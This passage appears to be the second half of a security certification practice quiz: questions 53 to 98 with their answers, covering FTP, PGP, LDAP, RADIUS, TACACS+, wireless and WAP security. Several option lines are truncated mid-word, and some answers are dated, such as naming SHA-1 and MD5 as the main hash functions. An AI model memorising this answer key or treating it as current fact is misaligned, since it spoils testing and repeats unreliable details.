- NAS

53. Active FTP is the default mode of operation.

- True

54. The smart cards Kerberos and public keys are all supported under which general protocol shown below?
-SSH
-EAP
-Telnet
-RADIUS

- EAP

55. When PGP is used, the plaintext portion of the message is compressed using the same compression methods as those commercially available in products such as WinZIP and PKZIP.

- True

56. When an FTP client establishes a connection to the server the user is authenticated. Which choice below correctly identifies this connection?
-Command connection
-Passive Connection
-Active connection
-None of these

- Command connection

57. Whether or not a signed applet will run and what resources it will be allowed to use is determined by which choice below?( Choose all that apply)
-Signed applets will run automatically
- If the applet is new the browser will display a security confirm

- If the applet is new the browser will display a security confirmation
- The end user determines which applets will and will not run

58. Instant Messaging programs have very serious security issues. Which of the choices below represent some of those issues? ( Choose all that apply)
- The communications are not encrypted.
- They can provide access to sensitive or confidential data.
-Wel

- They can provide access to sensitive or confidential data.
- It is possible to transmit files that contain viruses and Trojan horses.

59. If an individual's Distinguished Name is represented as: cn= John J Doe, ou= Standards and Practices Department, o= International Business Devices , c=United States . Which portion of this name represents the individuals common name?
-c
-o
-ou
-cn

- cn

60. PGP supports four major conventional encryption methods. Which of the following is not a supported encryption method?
-IDEA
-CAST
-DSA
-Twofish
-3DES

- DSA

61. The wildcard symbol (*) is used in which of the attack types listed below?
-Glob Vulnerability
-Bounce attack
-Clear Text attack
-All of these

- Glob Vulnerability

62. Two commonly used protocols for managing the security of message transmission across the "insecure" Internet are: (choose two)
-PGP
-Secure Sockets Layer (SSL)
-OpenPGP
-Transport Layer Security (TLS)

- Secure Sockets Layer (SSL)
- Transport Layer Security (TLS)

63. Which of the choices below correctly identifies the optional security mechanism that was specified by the 802.11 protocol in order to provide authentication and confidentiality in a wireless LAN environment?
-WTLS
-WEP
-WAP
-TLS

- WEP

64. Handshaking is a process that computers use to determine which of the following choices below?
-Available services
-Authentication
-Routing
-Communication parameters

- Communication parameters

65. If an individual's Distinguished Name is represented as: cn= John J Doe, ou= Standards and Practices Department, o= International Business Devices , c=United States . Which portion of this name represents the individuals' country?
-c
-o
-ou
-cn

- c

66. A signed applet is subject to the restrictions of the sandbox model.

- False

67. Authentication, data encryption, and privacy for WAP 1.x is provided by which protocol listed below?
-WTLS
-WTLP
-WTTS
-WTSL

- WTLS

68. War Driving can be used by unauthorized users to gain access to wireless networks.

- True

69. Two major hash functions are used today. Which two choices below represent these functions?
-SHA-5
-SHA-1
-NSA-1
-MD5
-MD1

- SHA-1
- MD5

70. The IPSec protocol does not support down level IP standards such as IPv4.

- False

71. The Secure File Transfer Protocol takes the traditional components of FTP and adds the security of SSH2 technology.

- False

72. Virtual network computing (VNC ) connections cannot be tunneled using an open SSH connection.

- False

73. ActiveX components containing malicious embedded Visual Basic code can be inserted into Microsoft Office documents by using which of the choices listed below?
-URL
-Macros
-JavaScript
-None of these

- Macros

74. LDAP communication is secured through a standards-based interface. This interface is referred to by which acronym listed below?
-SSL
-SASL
-ACL
-PKI

- SASL

75. The LDAP protocol provides authentication on three levels. Which of the choices below does not represent an LDAP authentication level?
-PKI
-SASL
-No authentication
-Simple authentication

- PKI

76. Active FTP is a considerable security risk because it allows which type of connections?
-Active
-Inbound
-Outbound
-Passive

- Inbound

77. Private certificate authorities are often used when no other relationship exists between two parties and they need to establish each other's identity.

- False

78. S/MIME recommends three symmetric encryption algorithms. Which of the choices below does not represent one of these recommended symmetric encryption algorithms?
-DES
-RC2
-3DES
-RSA

- RSA

79. In a TACACS+ session which choices below best describe what gets encrypted? (Choose two)
-Username, password and random packets for security
- The information concerning username, authorized services, and other information.
- The entire body of the pa

- The information concerning username, authorized services, and other information.
- The entire body of the packet.

80. Public key encryption is 1,000 times faster than conventional encryption.

- False

81. As an e-mail message is transported across the Internet it is handled by numerous SMTP servers. What does each SMTP server do to an e-mail message before forwarding it?
-None of these
-reassembles it
-disassembles it
-stamps it

- stamps it

82. ESP has the capability of hiding the regional source and destination addresses from public network users.

- True

83. The brief period during which data passing through a WAP gateway sits unencrypted while it is converted between WTLS (on the wireless side) and SSL/TLS (on the HTTP side) is best described by which term listed below?
-WAP TLS
-WAP Gap
-WAP Lag
-Wap Push

- WAP Gap

84. Application programming that does not check the size of the input fields is vulnerable to which attack type listed below?
-Cookies
-Macro
-Buffer Overflow
-JavaScript

- Buffer Overflow

85. Which LDAP operation will discontinue an operation that is in progress?
-Close
-Abandon
-Bind
-Unbind
-Delete

- Abandon

86. Which of the following security loopholes have been associated with JavaScript running on various browsers?
-All of these
-Monitor web Browsing
-Reading passwords and other Systems files
-Reading browser's preferences

- All of these

87. The two main types of encryption are:
-Digital Certificates
-Message Digest
-Conventional Encryption
-PGP
-Public Key cryptography

- Conventional encryption
- Public key cryptography

88. All FTP implementations support operating in passive mode.

- False

89. The FTP protocol is one of the earliest and most secure applications based on the TCP/IP protocol.

- False

90. The acronym PGP represents which of the choices listed below?
-Powerful Gateway Private
-Pretty Good Privacy
-Private Generic Protocol
-Pretty Good Protocol

- Pretty Good Privacy

91. TACACS+ separates authentication, authorization and accounting functions. Which of these functions are combined using RADIUS? (Choose two)
-Passwords
-Authentication
-Authorization
-Accounting

- Authentication
- Authorization

92. A VPN provides the added security of being highly fault tolerant.

- False

93. Error and exception handling governs the error responses that a web server exchanges with a client. Which choice below is an example of such a response?
-Cookies
-Applets
-Buffer Overflows
-404 File Error

- 404 (file not found) error

94. Which 802.11 standard adds multimedia and Quality of Service(QoS) capabilities to the MAC layer?
- 802.11b
- 802.11i
- 802.11m
- 802.11c
- 802.11a
- 802.11e

- 802.11e

95. RADIUS provides a system of distributed security for networks and network services. The primary use is to facilitate which type of connection shown below?
-None of these
-Remote
-Terminal
-Local

- Remote

96. The LDAP protocol provides the ability to authenticate users once and enable them to access mixed operating systems, different software packages, and other resources that normally would have required multiple authentications. Which acronym below repre

- SSO

97. Where does the RADIUS client/server architecture store its security information?
-In a single central database
-On each client
-On specific predetermined devices
-On the RAS

- In a single, central database.

98. The 802.11k working group was established to create MAC bridging functionality.

- False